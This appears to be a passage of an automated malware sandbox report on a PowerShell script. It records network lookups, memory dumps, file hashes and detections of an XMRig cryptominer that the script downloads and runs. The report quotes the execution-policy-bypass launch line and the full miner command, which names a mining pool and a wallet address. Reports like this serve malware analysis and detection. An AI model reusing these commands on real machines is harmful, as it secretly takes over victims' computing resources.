US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 198.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 248.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 98.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 95.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 31.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp

Files

memory/2548-0-0x00007FFE5FD43000-0x00007FFE5FD45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ibf3jvya.f5i.psm1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2548-6-0x0000015DF4BD0000-0x0000015DF4BF2000-memory.dmp

memory/2548-11-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-12-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-13-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-14-0x00007FFE5FD43000-0x00007FFE5FD45000-memory.dmp

memory/2548-15-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-16-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-18-0x00007FFE5FD40000-0x00007FFE60801000-memory.dmp

memory/2548-19-0x0000015DF7590000-0x0000015DF75A2000-memory.dmp

memory/2548-20-0x0000015DF7580000-0x0000015DF758A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3332-51-0x000001D04E1F0000-0x000001D04E210000-memory.dmp

memory/3332-52-0x000001D04FAF0000-0x000001D04FB10000-memory.dmp

memory/3332-53-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-54-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-56-0x000001D04FB30000-0x000001D04FB50000-memory.dmp

memory/3332-55-0x000001D04FB10000-0x000001D04FB30000-memory.dmp

memory/3332-57-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-58-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-60-0x000001D04FB30000-0x000001D04FB50000-memory.dmp

memory/3332-59-0x000001D04FB10000-0x000001D04FB30000-memory.dmp

memory/3332-61-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-62-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-63-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-64-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-65-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-66-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-67-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-68-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-69-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-70-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-71-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-72-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-73-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-74-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-75-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-76-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-77-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-78-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-79-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-80-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-81-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-82-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-83-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-84-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-85-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-86-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-87-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-88-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-89-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-90-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-91-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-92-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-93-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-94-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-95-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-96-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-97-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-98-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-99-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-100-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-101-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-102-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-103-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-104-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-105-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-106-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-107-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-108-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-109-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-110-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-111-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-112-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-113-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-114-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-115-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-116-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-117-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-118-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

memory/3332-119-0x00007FF798FA0000-0x00007FF799BD3000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:57

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1784s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/5068-0-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp

memory/5068-5-0x000001A8C4220000-0x000001A8C4242000-memory.dmp

memory/5068-8-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-9-0x000001A8C4450000-0x000001A8C44C6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0q1fnv5k.rxy.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5068-18-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-25-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/5068-48-0x000001A8C43F0000-0x000001A8C4402000-memory.dmp

memory/5068-61-0x000001A8C43D0000-0x000001A8C43DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1508-90-0x0000021EDCB60000-0x0000021EDCB80000-memory.dmp

memory/5068-92-0x00007FFF8D653000-0x00007FFF8D654000-memory.dmp

memory/1508-91-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/5068-93-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/1508-94-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/5068-95-0x00007FFF8D650000-0x00007FFF8E03C000-memory.dmp

memory/1508-96-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-97-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-98-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-99-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-100-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-101-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-102-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-103-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-104-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-105-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-106-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-107-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-108-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-109-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-110-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-111-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-112-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-113-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-114-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-115-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-116-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-117-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-118-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-119-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-120-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-121-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-122-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-123-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-124-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-125-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-126-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-127-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-128-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-129-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-130-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-131-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-132-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-133-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-134-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-135-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-136-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-137-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-138-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-139-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-140-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-141-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-142-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-143-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-144-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-145-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-146-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-147-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-148-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-149-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-150-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-151-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-152-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-153-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-154-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-155-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

memory/1508-156-0x00007FF614BF0000-0x00007FF615823000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:01

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp

Files

memory/4944-3-0x00007FFEEB413000-0x00007FFEEB414000-memory.dmp

memory/4944-5-0x000001F936AF0000-0x000001F936B12000-memory.dmp

memory/4944-8-0x00007FFEEB410000-0x00007FFEEBDFC000-memory.dmp

memory/4944-9-0x000001F936DF0000-0x000001F936E66000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpecwnkh.mq5.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4944-10-0x00007FFEEB410000-0x00007FFEEBDFC000-memory.dmp

memory/4944-25-0x00007FFEEB410000-0x00007FFEEBDFC000-memory.dmp

memory/4944-48-0x000001F936DB0000-0x000001F936DC2000-memory.dmp

memory/4944-61-0x000001F936B50000-0x000001F936B5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5032-90-0x0000023B490D0000-0x0000023B490F0000-memory.dmp

memory/5032-91-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-92-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/4944-93-0x00007FFEEB410000-0x00007FFEEBDFC000-memory.dmp

memory/4944-94-0x00007FFEEB413000-0x00007FFEEB414000-memory.dmp

memory/4944-95-0x00007FFEEB410000-0x00007FFEEBDFC000-memory.dmp

memory/5032-96-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-97-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-98-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-99-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-100-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-101-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-102-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-103-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-104-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-105-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-106-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-107-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-108-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-109-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-110-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-111-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-112-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-113-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-114-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-115-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-116-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-117-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-118-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-119-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-120-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-121-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-122-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-123-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-124-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-125-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-126-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-127-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-128-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-129-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-130-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-131-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-132-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-133-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-134-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-135-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-136-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-137-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-138-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-139-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-140-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-141-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-142-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-143-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-144-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-145-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-146-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-147-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-148-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-149-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-150-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-151-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-152-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-153-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-154-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-155-0x00007FF690D00000-0x00007FF691933000-memory.dmp

memory/5032-156-0x00007FF690D00000-0x00007FF691933000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

